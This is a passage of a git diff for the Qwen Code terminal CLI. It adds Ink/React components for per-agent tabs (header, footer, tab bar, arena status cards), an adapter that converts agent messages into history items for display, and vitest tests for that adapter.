useStdin(); + + const { + status, + streamingState, + isInputActive, + elapsedTime, + lastPromptTokenCount, + } = useAgentStreamingState(interactiveAgent); + + // ── Escape to cancel the active agent round ── + + useKeypress( + (key) => { + if ( + key.name === 'escape' && + streamingState === StreamingState.Responding + ) { + interactiveAgent?.cancelCurrentRound(); + } + }, + { + isActive: + streamingState === StreamingState.Responding && !agentShellFocused, + }, + ); + + // ── Shift+Tab to cycle this agent's approval mode ── + + const agentApprovalMode = + agentApprovalModes.get(agentId) ?? ApprovalMode.DEFAULT; + + useKeypress( + (key) => { + const isShiftTab = key.shift && key.name === 'tab'; + const isWindowsTab = + process.platform === 'win32' && + key.name === 'tab' && + !key.ctrl && + !key.meta; + if (isShiftTab || isWindowsTab) { + const currentIndex = APPROVAL_MODES.indexOf(agentApprovalMode); + const nextIndex = + currentIndex === -1 ? 0 : (currentIndex + 1) % APPROVAL_MODES.length; + setAgentApprovalMode(agentId, APPROVAL_MODES[nextIndex]!); + } + }, + { isActive: !agentShellFocused }, + ); + + // ── Input buffer (independent from main agent) ── + + const isValidPath = useCallback((): boolean => false, []); + + const buffer = useTextBuffer({ + initialText: '', + viewport: { height: 3, width: inputWidth }, + stdin, + setRawMode, + isValidPath, + }); + + // Sync agent buffer text to context so AgentTabBar can guard tab switching + useEffect(() => { + setAgentInputBufferText(buffer.text); + return () => setAgentInputBufferText(''); + }, [buffer.text, setAgentInputBufferText]); + + // When agent input is not active (agent running, completed, etc.), + // auto-focus the tab bar so arrow keys switch tabs directly. 
+ // We also depend on streamingState so that transitions like + // WaitingForConfirmation → Responding re-trigger the effect — the + // approval keypress releases tab-bar focus (printable char handler), + // but isInputActive stays false throughout, so without this extra + // dependency the focus would never be restored. + useEffect(() => { + if (!isInputActive) { + setAgentTabBarFocused(true); + } + }, [isInputActive, streamingState, setAgentTabBarFocused]); + + // ── Focus management between input and tab bar ── + + const handleKeypress = useCallback( + (key: Key): boolean => { + // When tab bar has focus, block all non-printable keys so they don't + // act on the hidden buffer. Printable characters fall through to + // BaseTextInput naturally; the tab bar handler releases focus on the + // same event so the keystroke appears in the input immediately. + if (agentTabBarFocused) { + if ( + key.sequence && + key.sequence.length === 1 && + !key.ctrl && + !key.meta + ) { + return false; // let BaseTextInput type the character + } + return true; // consume non-printable keys + } + + // Down arrow at the bottom edge (or empty buffer) → focus the tab bar + if (keyMatchers[Command.NAVIGATION_DOWN](key)) { + if ( + buffer.text === '' || + buffer.allVisualLines.length === 1 || + buffer.visualCursor[0] === buffer.allVisualLines.length - 1 + ) { + setAgentTabBarFocused(true); + return true; + } + } + return false; + }, + [buffer, agentTabBarFocused, setAgentTabBarFocused], + ); + + // ── Message queue (accumulate while streaming, flush as one prompt on idle) ── + + const [messageQueue, setMessageQueue] = useState([]); + + // When agent becomes idle (and not terminal), flush queued messages. 
+ useEffect(() => { + if ( + streamingState === StreamingState.Idle && + messageQueue.length > 0 && + status !== undefined && + !isTerminalStatus(status) + ) { + const combined = messageQueue.join('\n'); + setMessageQueue([]); + interactiveAgent?.enqueueMessage(combined); + } + }, [streamingState, messageQueue, interactiveAgent, status]); + + const handleSubmit = useCallback( + (text: string) => { + const trimmed = text.trim(); + if (!trimmed || !interactiveAgent) return; + if (streamingState === StreamingState.Idle) { + interactiveAgent.enqueueMessage(trimmed); + } else { + setMessageQueue((prev) => [...prev, trimmed]); + } + }, + [interactiveAgent, streamingState], + ); + + // ── Render ── + + const statusLabel = useMemo(() => { + switch (status) { + case AgentStatus.COMPLETED: + return { text: t('Completed'), color: theme.status.success }; + case AgentStatus.FAILED: + return { + text: t('Failed: {{error}}', { + error: + interactiveAgent?.getError() ?? + interactiveAgent?.getLastRoundError() ?? + 'unknown', + }), + color: theme.status.error, + }; + case AgentStatus.CANCELLED: + return { text: t('Cancelled'), color: theme.text.secondary }; + default: + return null; + } + }, [status, interactiveAgent]); + + // ── Approval-mode styling (mirrors main InputPrompt) ── + + const isYolo = agentApprovalMode === ApprovalMode.YOLO; + const isAutoAccept = agentApprovalMode !== ApprovalMode.DEFAULT; + + const statusColor = isYolo + ? theme.status.errorDim + : isAutoAccept + ? theme.status.warningDim + : undefined; + + const inputBorderColor = + !isInputActive || agentTabBarFocused + ? theme.border.default + : (statusColor ?? theme.border.focused); + + const prefixNode = ( + {isYolo ? '*' : '>'} + ); + + return ( + + + {/* Loading indicator — mirrors main Composer but reads agent's + streaming state via the overridden StreamingContext. 
*/} + + + {/* Terminal status for completed/failed agents */} + {statusLabel && ( + + {statusLabel.text} + + )} + + + + {/* Input prompt — always visible, like the main Composer */} + + + {/* Footer: approval mode + context usage */} + + + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/AgentFooter.tsx b/packages/cli/src/ui/components/agent-view/AgentFooter.tsx new file mode 100644 index 000000000..7b05e4e47 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentFooter.tsx @@ -0,0 +1,66 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Lightweight footer for agent tabs showing approval mode + * and context usage. Mirrors the main Footer layout but without + * main-agent-specific concerns (vim mode, shell mode, exit prompts, etc.). + */ + +import type React from 'react'; +import { Box, Text } from 'ink'; +import { ApprovalMode } from '@qwen-code/qwen-code-core'; +import { AutoAcceptIndicator } from '../AutoAcceptIndicator.js'; +import { ContextUsageDisplay } from '../ContextUsageDisplay.js'; +import { theme } from '../../semantic-colors.js'; + +interface AgentFooterProps { + approvalMode: ApprovalMode | undefined; + promptTokenCount: number; + contextWindowSize: number | undefined; + terminalWidth: number; +} + +export const AgentFooter: React.FC = ({ + approvalMode, + promptTokenCount, + contextWindowSize, + terminalWidth, +}) => { + const showApproval = + approvalMode !== undefined && approvalMode !== ApprovalMode.DEFAULT; + const showContext = promptTokenCount > 0 && contextWindowSize !== undefined; + + if (!showApproval && !showContext) { + return null; + } + + return ( + + + {showApproval ? 
( + + ) : null} + + + {showContext && ( + + + + )} + + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/AgentHeader.tsx b/packages/cli/src/ui/components/agent-view/AgentHeader.tsx new file mode 100644 index 000000000..1bf9d4c34 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentHeader.tsx @@ -0,0 +1,64 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Compact header for agent tabs, visually distinct from the + * main view's boxed logo header. Shows model, working directory, and git + * branch in a bordered info panel. + */ + +import type React from 'react'; +import { Box, Text } from 'ink'; +import { shortenPath, tildeifyPath } from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useTerminalSize } from '../../hooks/useTerminalSize.js'; + +interface AgentHeaderProps { + modelId: string; + modelName?: string; + workingDirectory: string; + gitBranch?: string; +} + +export const AgentHeader: React.FC = ({ + modelId, + modelName, + workingDirectory, + gitBranch, +}) => { + const { columns: terminalWidth } = useTerminalSize(); + const maxPathLen = Math.max(20, terminalWidth - 12); + const displayPath = shortenPath(tildeifyPath(workingDirectory), maxPathLen); + + const modelText = + modelName && modelName !== modelId ? 
/**
 * Choose the glyph and colour shown next to an agent's tab, based on the
 * status reported by `agent.interactiveAgent.getStatus()`.
 *
 * - running / initializing → filled dot in the warning colour
 * - idle                   → filled dot in the success colour
 * - completed              → check mark in the success colour
 * - failed                 → ballot cross in the error colour
 * - cancelled, or any status not listed above → hollow circle in the
 *   secondary text colour
 */
function statusIndicator(agent: RegisteredAgent): {
  symbol: string;
  color: string;
} {
  const current = agent.interactiveAgent.getStatus();

  if (
    current === AgentStatus.RUNNING ||
    current === AgentStatus.INITIALIZING
  ) {
    return { symbol: '\u25CF', color: theme.status.warning }; // ● running
  }
  if (current === AgentStatus.IDLE) {
    return { symbol: '\u25CF', color: theme.status.success }; // ● idle (ready)
  }
  if (current === AgentStatus.COMPLETED) {
    return { symbol: '\u2713', color: theme.status.success }; // ✓ completed
  }
  if (current === AgentStatus.FAILED) {
    return { symbol: '\u2717', color: theme.status.error }; // ✗ failed
  }

  // Cancelled agents and unrecognised statuses share the same neutral marker.
  return { symbol: '\u25CB', color: theme.text.secondary }; // ○ cancelled / fallback
}
+ const [, setTick] = useState(0); + const forceRender = useCallback(() => setTick((t) => t + 1), []); + + useEffect(() => { + const cleanups: Array<() => void> = []; + for (const [, agent] of agents) { + const emitter = agent.interactiveAgent.getEventEmitter(); + if (emitter) { + emitter.on(AgentEventType.STATUS_CHANGE, forceRender); + cleanups.push(() => + emitter.off(AgentEventType.STATUS_CHANGE, forceRender), + ); + } + } + return () => cleanups.forEach((fn) => fn()); + }, [agents, forceRender]); + + const isFocused = agentTabBarFocused; + + // Navigation hint varies by context + const hint = isFocused ? '\u2190/\u2192 switch \u2191 input' : '\u2193 tabs'; + + return ( + + {/* Main tab */} + + + {' Main '} + + + + {/* Separator */} + + {'\u2502'} + + + {/* Agent tabs */} + {[...agents.entries()].map(([agentId, agent]) => { + const isActive = activeView === agentId; + const { symbol, color: indicatorColor } = statusIndicator(agent); + + return ( + + + {` ${agent.modelId} `} + + + {` ${symbol}`} + + + ); + })} + + {/* Navigation hint */} + + {hint} + + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.test.ts b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.test.ts new file mode 100644 index 000000000..afedfc2b6 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.test.ts @@ -0,0 +1,510 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect } from 'vitest'; +import { agentMessagesToHistoryItems } from './agentHistoryAdapter.js'; +import type { + AgentMessage, + ToolCallConfirmationDetails, +} from '@qwen-code/qwen-code-core'; +import { ToolCallStatus } from '../../types.js'; + +// ─── Helpers ──────────────────────────────────────────────── + +function msg( + role: AgentMessage['role'], + content: string, + extra?: Partial, +): AgentMessage { + return { role, content, timestamp: 0, ...extra }; +} + +const 
noApprovals = new Map(); + +function toolCallMsg( + callId: string, + toolName: string, + opts?: { description?: string; renderOutputAsMarkdown?: boolean }, +): AgentMessage { + return msg('tool_call', `Tool call: ${toolName}`, { + metadata: { + callId, + toolName, + description: opts?.description ?? '', + renderOutputAsMarkdown: opts?.renderOutputAsMarkdown, + }, + }); +} + +function toolResultMsg( + callId: string, + toolName: string, + opts?: { + success?: boolean; + resultDisplay?: string; + outputFile?: string; + }, +): AgentMessage { + return msg('tool_result', `Tool ${toolName}`, { + metadata: { + callId, + toolName, + success: opts?.success ?? true, + resultDisplay: opts?.resultDisplay, + outputFile: opts?.outputFile, + }, + }); +} + +// ─── Role mapping ──────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — role mapping', () => { + it('maps user message', () => { + const items = agentMessagesToHistoryItems( + [msg('user', 'hello')], + noApprovals, + ); + expect(items).toHaveLength(1); + expect(items[0]).toMatchObject({ type: 'user', text: 'hello' }); + }); + + it('maps plain assistant message', () => { + const items = agentMessagesToHistoryItems( + [msg('assistant', 'response')], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'gemini', text: 'response' }); + }); + + it('maps thought assistant message', () => { + const items = agentMessagesToHistoryItems( + [msg('assistant', 'thinking...', { thought: true })], + noApprovals, + ); + expect(items[0]).toMatchObject({ + type: 'gemini_thought', + text: 'thinking...', + }); + }); + + it('maps assistant message with error metadata', () => { + const items = agentMessagesToHistoryItems( + [msg('assistant', 'oops', { metadata: { error: true } })], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'error', text: 'oops' }); + }); + + it('maps info message with no level → type info', () => { + const items = agentMessagesToHistoryItems( + [msg('info', 'note')], + 
noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'info', text: 'note' }); + }); + + it.each([ + ['warning', 'warning'], + ['success', 'success'], + ['error', 'error'], + ] as const)('maps info message with level=%s', (level, expectedType) => { + const items = agentMessagesToHistoryItems( + [msg('info', 'text', { metadata: { level } })], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: expectedType }); + }); + + it('maps unknown info level → type info', () => { + const items = agentMessagesToHistoryItems( + [msg('info', 'x', { metadata: { level: 'verbose' } })], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'info' }); + }); + + it('skips unknown roles without crashing', () => { + const items = agentMessagesToHistoryItems( + [ + msg('user', 'before'), + // force an unknown role + { role: 'unknown' as AgentMessage['role'], content: 'x', timestamp: 0 }, + msg('user', 'after'), + ], + noApprovals, + ); + expect(items).toHaveLength(2); + expect(items[0]).toMatchObject({ type: 'user', text: 'before' }); + expect(items[1]).toMatchObject({ type: 'user', text: 'after' }); + }); +}); + +// ─── Tool grouping ─────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — tool grouping', () => { + it('merges a tool_call + tool_result pair into one tool_group', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'read_file'), toolResultMsg('c1', 'read_file')], + noApprovals, + ); + expect(items).toHaveLength(1); + expect(items[0]!.type).toBe('tool_group'); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools).toHaveLength(1); + expect(group.tools[0]!.name).toBe('read_file'); + }); + + it('merges multiple parallel tool calls into one tool_group', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'read_file'), + toolCallMsg('c2', 'write_file'), + toolResultMsg('c1', 'read_file'), + toolResultMsg('c2', 'write_file'), + 
], + noApprovals, + ); + expect(items).toHaveLength(1); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools).toHaveLength(2); + expect(group.tools[0]!.name).toBe('read_file'); + expect(group.tools[1]!.name).toBe('write_file'); + }); + + it('preserves tool call order by first appearance', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c2', 'second'), + toolCallMsg('c1', 'first'), + toolResultMsg('c1', 'first'), + toolResultMsg('c2', 'second'), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.name).toBe('second'); + expect(group.tools[1]!.name).toBe('first'); + }); + + it('breaks tool groups at non-tool messages', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'tool_a'), + toolResultMsg('c1', 'tool_a'), + msg('assistant', 'between'), + toolCallMsg('c2', 'tool_b'), + toolResultMsg('c2', 'tool_b'), + ], + noApprovals, + ); + expect(items).toHaveLength(3); + expect(items[0]!.type).toBe('tool_group'); + expect(items[1]!.type).toBe('gemini'); + expect(items[2]!.type).toBe('tool_group'); + }); + + it('handles tool_result arriving without a prior tool_call gracefully', () => { + const items = agentMessagesToHistoryItems( + [ + toolResultMsg('c1', 'orphan', { + success: true, + resultDisplay: 'output', + }), + ], + noApprovals, + ); + expect(items).toHaveLength(1); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.callId).toBe('c1'); + expect(group.tools[0]!.status).toBe(ToolCallStatus.Success); + }); +}); + +// ─── Tool status ───────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — tool status', () => { + it('Executing: tool_call with no result yet', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + ); + const group = items[0] as 
Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Executing); + }); + + it('Success: tool_result with success=true', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'read'), + toolResultMsg('c1', 'read', { success: true }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Success); + }); + + it('Error: tool_result with success=false', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'write'), + toolResultMsg('c1', 'write', { success: false }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Error); + }); + + it('Confirming: tool_call present in pendingApprovals', () => { + const fakeApproval = {} as ToolCallConfirmationDetails; + const approvals = new Map([['c1', fakeApproval]]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + approvals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Confirming); + expect(group.tools[0]!.confirmationDetails).toBe(fakeApproval); + }); + + it('Confirming takes priority over Executing', () => { + // pending approval AND no result yet → Confirming, not Executing + const approvals = new Map([['c1', {} as ToolCallConfirmationDetails]]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + approvals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Confirming); + }); +}); + +// ─── Tool metadata ─────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — tool metadata', () => { + it('forwards resultDisplay from 
tool_result', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'read'), + toolResultMsg('c1', 'read', { + success: true, + resultDisplay: 'file contents', + }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBe('file contents'); + }); + + it('forwards renderOutputAsMarkdown from tool_call', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'web_fetch', { renderOutputAsMarkdown: true }), + toolResultMsg('c1', 'web_fetch', { success: true }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.renderOutputAsMarkdown).toBe(true); + }); + + it('forwards description from tool_call', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'read', { description: 'reading src/index.ts' })], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.description).toBe('reading src/index.ts'); + }); +}); + +// ─── liveOutputs overlay ───────────────────────────────────── + +describe('agentMessagesToHistoryItems — liveOutputs', () => { + it('uses liveOutput as resultDisplay for Executing tools', () => { + const liveOutputs = new Map([['c1', 'live stdout so far']]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + liveOutputs, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBe('live stdout so far'); + }); + + it('ignores liveOutput for completed tools', () => { + const liveOutputs = new Map([['c1', 'stale live output']]); + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'shell'), + toolResultMsg('c1', 'shell', { + success: true, + resultDisplay: 'final output', + }), + ], + noApprovals, + 
liveOutputs, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBe('final output'); + }); + + it('falls back to entry resultDisplay when no liveOutput for callId', () => { + const liveOutputs = new Map([['other-id', 'unrelated']]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + liveOutputs, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBeUndefined(); + }); +}); + +// ─── shellPids overlay ─────────────────────────────────────── + +describe('agentMessagesToHistoryItems — shellPids', () => { + it('sets ptyId for Executing tools with a known PID', () => { + const shellPids = new Map([['c1', 12345]]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + undefined, + shellPids, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.ptyId).toBe(12345); + }); + + it('does not set ptyId for completed tools', () => { + const shellPids = new Map([['c1', 12345]]); + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'shell'), + toolResultMsg('c1', 'shell', { success: true }), + ], + noApprovals, + undefined, + shellPids, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.ptyId).toBeUndefined(); + }); + + it('does not set ptyId when shellPids is not provided', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.ptyId).toBeUndefined(); + }); +}); + +// ─── ID stability ──────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — ID stability', () => { + it('assigns monotonically increasing 
IDs', () => { + const items = agentMessagesToHistoryItems( + [ + msg('user', 'u1'), + msg('assistant', 'a1'), + msg('info', 'i1'), + toolCallMsg('c1', 'tool'), + toolResultMsg('c1', 'tool'), + ], + noApprovals, + ); + const ids = items.map((i) => i.id); + expect(ids).toEqual([0, 1, 2, 3]); + }); + + it('tool_group consumes one ID regardless of how many calls it contains', () => { + const items = agentMessagesToHistoryItems( + [ + msg('user', 'go'), + toolCallMsg('c1', 'tool_a'), + toolCallMsg('c2', 'tool_b'), + toolResultMsg('c1', 'tool_a'), + toolResultMsg('c2', 'tool_b'), + msg('assistant', 'done'), + ], + noApprovals, + ); + // user=0, tool_group=1, assistant=2 + expect(items.map((i) => i.id)).toEqual([0, 1, 2]); + }); + + it('IDs from a prefix of messages are stable when more messages are appended', () => { + const base: AgentMessage[] = [msg('user', 'u'), msg('assistant', 'a')]; + + const before = agentMessagesToHistoryItems(base, noApprovals); + const after = agentMessagesToHistoryItems( + [...base, msg('info', 'i')], + noApprovals, + ); + + expect(after[0]!.id).toBe(before[0]!.id); + expect(after[1]!.id).toBe(before[1]!.id); + expect(after[2]!.id).toBe(2); + }); +}); diff --git a/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.ts b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.ts new file mode 100644 index 000000000..951618abf --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.ts @@ -0,0 +1,194 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview agentHistoryAdapter — converts AgentMessage[] to HistoryItem[]. + * + * This adapter bridges the sub-agent data model (AgentMessage[] from + * AgentInteractive) to the shared rendering model (HistoryItem[] consumed by + * HistoryItemDisplay). It lives in the CLI package so that packages/core types + * are never coupled to CLI rendering types. 
/**
 * Convert AgentMessage[] + pendingApprovals into HistoryItem[].
 *
 * Role mapping:
 * - `user`      → `user`
 * - `assistant` → `error` when `metadata.error` is truthy, otherwise
 *                 `gemini_thought` when `thought` is set, otherwise `gemini`
 * - `info`      → `warning` / `success` / `error` when `metadata.level` is one
 *                 of those values, otherwise `info`
 * - a consecutive run of `tool_call` / `tool_result` messages → a single
 *   `tool_group` item; calls are listed in order of first appearance
 * - any other role is skipped and does not consume an ID
 *
 * IDs are handed out sequentially from 0 in output order. A tool group takes
 * exactly one ID regardless of how many calls it contains, so the IDs of a
 * prefix of `messages` do not change when more messages are appended.
 *
 * Tool status precedence: a call present in `pendingApprovals` is Confirming;
 * otherwise a call with no recorded `success` is Executing; otherwise
 * `success` selects Success or Error.
 *
 * @param messages - Agent transcript, oldest first.
 * @param pendingApprovals - callId → confirmation details for calls awaiting
 *   user approval; forwarded as `confirmationDetails`.
 * @param liveOutputs - Optional callId → in-progress output. Used as
 *   `resultDisplay` only while the call is Executing.
 * @param shellPids - Optional callId → PID. Exposed as `ptyId` only while the
 *   call is Executing.
 * @returns History items in transcript order.
 */
export function agentMessagesToHistoryItems(
  messages: readonly AgentMessage[],
  pendingApprovals: ReadonlyMap<string, ToolCallConfirmationDetails>,
  liveOutputs?: ReadonlyMap<string, ToolResultDisplay | string>,
  shellPids?: ReadonlyMap<string, number>,
): HistoryItem[] {
  const items: HistoryItem[] = [];
  let nextId = 0;
  let i = 0;

  while (i < messages.length) {
    const msg = messages[i]!;

    // ── user ──────────────────────────────────────────────────
    if (msg.role === 'user') {
      items.push({ type: 'user', text: msg.content, id: nextId++ });
      i++;

      // ── assistant ─────────────────────────────────────────────
    } else if (msg.role === 'assistant') {
      if (msg.metadata?.['error']) {
        items.push({ type: 'error', text: msg.content, id: nextId++ });
      } else if (msg.thought) {
        items.push({ type: 'gemini_thought', text: msg.content, id: nextId++ });
      } else {
        items.push({ type: 'gemini', text: msg.content, id: nextId++ });
      }
      i++;

      // ── info / warning / success / error ──────────────────────
    } else if (msg.role === 'info') {
      const level = msg.metadata?.['level'] as string | undefined;
      // Unrecognised levels degrade to plain 'info'.
      const type =
        level === 'warning' || level === 'success' || level === 'error'
          ? level
          : 'info';
      items.push({ type, text: msg.content, id: nextId++ });
      i++;

      // ── tool_call / tool_result → tool_group ──────────────────
    } else if (msg.role === 'tool_call' || msg.role === 'tool_result') {
      // Reserve the group's ID before consuming the run so that the group
      // keeps its position in the ID sequence.
      const groupId = nextId++;

      const callMap = new Map<
        string,
        {
          callId: string;
          name: string;
          description: string;
          resultDisplay: ToolResultDisplay | string | undefined;
          outputFile: string | undefined;
          renderOutputAsMarkdown: boolean | undefined;
          success: boolean | undefined;
        }
      >();
      // Map iteration order would also work, but an explicit list makes the
      // "order of first appearance" contract obvious.
      const callOrder: string[] = [];

      while (
        i < messages.length &&
        (messages[i]!.role === 'tool_call' ||
          messages[i]!.role === 'tool_result')
      ) {
        const m = messages[i]!;
        // Messages without a callId get a per-index placeholder so they never
        // collide with each other.
        const callId = (m.metadata?.['callId'] as string) ?? `unknown-${i}`;

        if (m.role === 'tool_call') {
          if (!callMap.has(callId)) callOrder.push(callId);
          callMap.set(callId, {
            callId,
            name: (m.metadata?.['toolName'] as string) ?? 'unknown',
            description: (m.metadata?.['description'] as string) ?? '',
            resultDisplay: undefined,
            outputFile: undefined,
            renderOutputAsMarkdown: m.metadata?.['renderOutputAsMarkdown'] as
              | boolean
              | undefined,
            success: undefined,
          });
        } else {
          // tool_result — attach to existing call entry
          const entry = callMap.get(callId);
          const resultDisplay = m.metadata?.['resultDisplay'] as
            | ToolResultDisplay
            | string
            | undefined;
          const outputFile = m.metadata?.['outputFile'] as string | undefined;
          // NOTE(review): if a result's metadata omits `success`, this stays
          // undefined and the call is rendered as Executing — confirm that
          // producers always set it.
          const success = m.metadata?.['success'] as boolean;

          if (entry) {
            entry.success = success;
            entry.resultDisplay = resultDisplay;
            entry.outputFile = outputFile;
          } else {
            // Result arrived without a prior tool_call message (shouldn't
            // normally happen, but handle gracefully)
            callOrder.push(callId);
            callMap.set(callId, {
              callId,
              name: (m.metadata?.['toolName'] as string) ?? 'unknown',
              description: '',
              resultDisplay,
              outputFile,
              renderOutputAsMarkdown: undefined,
              success,
            });
          }
        }
        i++;
      }

      const tools: IndividualToolCallDisplay[] = callOrder.map((callId) => {
        const entry = callMap.get(callId)!;
        const approval = pendingApprovals.get(callId);

        // A pending approval wins over every other state.
        let status: ToolCallStatus;
        if (approval) {
          status = ToolCallStatus.Confirming;
        } else if (entry.success === undefined) {
          status = ToolCallStatus.Executing;
        } else if (entry.success) {
          status = ToolCallStatus.Success;
        } else {
          status = ToolCallStatus.Error;
        }

        // Live output is only meaningful while the tool is still running;
        // once a result exists the recorded resultDisplay is authoritative.
        const resultDisplay =
          status === ToolCallStatus.Executing && liveOutputs?.has(callId)
            ? liveOutputs.get(callId)
            : entry.resultDisplay;

        return {
          callId: entry.callId,
          name: entry.name,
          description: entry.description,
          resultDisplay,
          outputFile: entry.outputFile,
          renderOutputAsMarkdown: entry.renderOutputAsMarkdown,
          status,
          confirmationDetails: approval,
          // Likewise, a PID is only surfaced for a call that is executing.
          ptyId:
            status === ToolCallStatus.Executing
              ? shellPids?.get(callId)
              : undefined,
        };
      });

      items.push({ type: 'tool_group', tools, id: groupId });
    } else {
      // Skip unknown roles
      i++;
    }
  }

  return items;
}
agent.inputTokens.toLocaleString(); + const outTokens = agent.outputTokens.toLocaleString(); + + return ( + + {/* Line 1: Status icon + text + label + duration */} + + + {icon} {agent.label} · {text} · {duration} + + + + {/* Line 2: Tokens */} + + + Tokens: {tokens} (in {inTokens}, out {outTokens}) + + + + {/* Line 3: Tool Calls with colored success/error counts */} + + + Tool Calls: {agent.toolCalls} + {agent.failedToolCalls > 0 && ( + <> + {' '} + ( + + ✓ {agent.successfulToolCalls} + + + ✕ {agent.failedToolCalls}) + + )} + + + + {/* Error line (if terminated with error) */} + {agent.error && ( + + {agent.error} + + )} + + ); +}; + +// ─── Session Complete Card ────────────────────────────────── + +interface ArenaSessionCardProps { + sessionStatus: string; + task: string; + totalDurationMs: number; + agents: ArenaAgentCardData[]; + width?: number; +} + +/** + * Pad or truncate a string to a fixed visual width. + */ +function pad( + str: string, + len: number, + align: 'left' | 'right' = 'left', +): string { + if (str.length >= len) return str.slice(0, len); + const padding = ' '.repeat(len - str.length); + return align === 'right' ? padding + str : str + padding; +} + +/** + * Truncate a string to a maximum length, adding ellipsis if truncated. + */ +function truncate(str: string, maxLen: number): string { + if (str.length <= maxLen) return str; + return str.slice(0, maxLen - 1) + '…'; +} + +/** + * Calculate diff stats from a unified diff string. + * Returns the stats string and individual counts for colored rendering. 
